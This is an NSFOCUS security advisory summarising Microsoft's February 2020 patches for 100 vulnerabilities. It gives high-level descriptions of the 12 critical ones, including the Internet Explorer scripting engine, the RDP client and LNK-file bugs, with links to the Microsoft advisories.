Overview
Microsoft released the February 2020 security patches on Tuesday that fixes 100 vulnerabilities ranging from simple spoofing attacks to remote code execution in various products, including Adobe Flash Player, Internet Explorer, Microsoft Edge, Microsoft Exchange Server, Microsoft Graphics Component, Microsoft Malware Protection Engine, Microsoft Office, Microsoft Office SharePoint, Microsoft Scripting Engine, Microsoft Windows, Microsoft Windows Search Component, Remote Desktop Client, Secure Boot, SQL Server, Windows Authentication Methods, Windows COM, Windows Hyper-V, Windows Installer, Windows Kernel, Windows Kernel-Mode Drivers, Windows Media, Windows NDIS, Windows RDP, Windows Shell, and Windows Update Stack.
Among these vulnerabilities, there are 12 critical vulnerabilities and 88 important vulnerabilities.
Critical Vulnerability Description
The patches fix the following 12 critical vulnerabilities.
Microsoft Scripting Engine
- CVE-2020-0673, CVE-2020-0674
On January 17, Microsoft released an advisory for the CVE-2020-0674 vulnerability, announcing that some attackers in the wild were attempting to exploit this vulnerability. Only applicable workarounds and mitigation measures were provided in the advisory. The security update provides a patch for fixing this vulnerability.
A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer.
An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. If the current user is logged in with administrative user rights, an attacker could exploit this vulnerability to take complete control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
In a web-based attack scenario, an attacker could craft a website and then convince a user to view the website. In this case, however, attackers would have no way to force users to view the malicious content but choose to send an email or instant message to trick users into doing so. An attacker could also embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the IE rendering engine.
Internet Explorer 9, 10, and 11 are affected.
For more details about the vulnerabilities and updates, click the following links:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0673
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0674
- CVE-2020-0710, CVE-2020-0711, CVE-2020-0712, CVE-2020-0713, CVE-2020-0767
A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user.
For more details about the vulnerabilities and updates, click the following links:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0710
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0711
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0712
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0713
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0767
RDP
- CVE-2020-0681, CVE-2020-0734
CVE-2020-0681 and CVE-2020-0734 are remote code execution vulnerabilities in the Windows Remote Desktop client.
An attacker who successfully exploited this vulnerability could execute arbitrary code on users’ computers connecting to the malicious server. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
To exploit this vulnerability, an attacker needs to take control of the server and then trick users into connecting to the server. This vulnerability could be triggered if a user visits the malicious server. Though attackers could not force a user to connect to the malicious server, they could trick them into doing so via social engineering, DNS poisoning, or man-in-the-middle (MITM) technique. Attackers could also exploit this vulnerability to compromise a legitimate server and host malicious code on it, and then wait for users to connect to the server.
For more details about the vulnerabilities and updates, click the following links:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0681
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0734
Windows
- CVE-2020-0662
A remote code execution vulnerability exists in the way that Windows handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code with escalated privileges on the target system.
To exploit the vulnerability, an attacker who has a domain user account could create a specially crafted request, causing Windows to execute arbitrary code with escalated privileges.
For more details about the vulnerability and update, click the following link:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0662
LNK
- CVE-2020-0729
A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed.
An attacker who successfully exploited this vulnerability could gain the same user rights as the local user.
An attacker could exploit this vulnerability by sending the user a removable drive or remote share containing a malicious .LNK file and an associated malicious binary. If the user opens the file (or remote share) in Windows Explorer or another application that parses .LNK files, the malicious binary will execute code of the attacker’s choice on the target system.
For more details about the vulnerability and update, click the following link:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0729
Media Foundation
- CVE-2020-0738
A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.
An attacker who successfully exploited this vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights.
There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious web page.
For more details about the vulnerability and update, click the following link:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0738
Statement
This advisory is only used to describe a potential risk. NSFOCUS does not provide any commitment or promise on this advisory. NSFOCUS and the author will not bear any liability for any direct and/or indirect consequences and losses caused by transmitting and/or using this advisory. NSFOCUS reserves all the rights to modify and interpret this advisory. Please include this statement paragraph when reproducing or transferring this advisory. Do not modify this advisory, add/delete information to/from it, or use this advisory for commercial purposes without permission from NSFOCUS.
About NSFOCUS
NSFOCUS Information Technology Co., Ltd. (NSFOCUS) was founded in April 2000. With more than 30 branches and subsidiaries at home and abroad, the company provides most competitive security products and solutions for governments, carriers, and financial, energy, Internet, education, and medical sectors, ensuring customers’ business continuity.
Based on years of research in security assurance, NSFOCUS has set foot in network and terminal security, Internet infrastructure security, and compliance and security management. The company provides the intrusion detection/prevention system, anti-DDoS system, remote security assessment system, and web security protection products as well as professional security services for customers.
NSFOCUS Information Technology Co., Ltd. started trading its shares at China’s Nasdaq-style market, ChiNext, in Shenzhen on January 29, 2014, with the name of NSFOCUS and code of 300369.
Download: ‘s Security Bulletin for February 2020 Patches That Fix 100 Security Vulnerabilities Threat Alert